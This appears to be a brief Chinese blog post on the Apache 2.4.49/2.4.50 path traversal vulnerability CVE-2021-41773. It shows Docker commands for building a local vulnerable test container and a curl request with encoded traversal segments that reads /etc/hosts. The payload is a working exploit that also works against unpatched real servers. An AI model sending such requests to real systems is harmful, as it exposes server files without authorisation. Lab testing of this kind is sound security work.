就是 > CVE-2021-41773

Apache 也在 10/7 號更新了版本 CHANGES_2.4.51

↑ 它說影響範圍是 2.4.49 與 2.4.50 版本,(舊版本是沒有的)

可以 POC 測試 >> /CVE-2021-41773

用 docker 測試

git clone https://github.com/masahiro331/CVE-2021-41773.git
cd CVE-2021-41773
docker build -t cve-2021-41773 .
docker run -d -p 8080:80 cve-2021-41773
curl http://localhost:8080/cgi-bin/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/.%2E/etc/hosts
最後修改日期: 2021 年 10 月 08 日

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。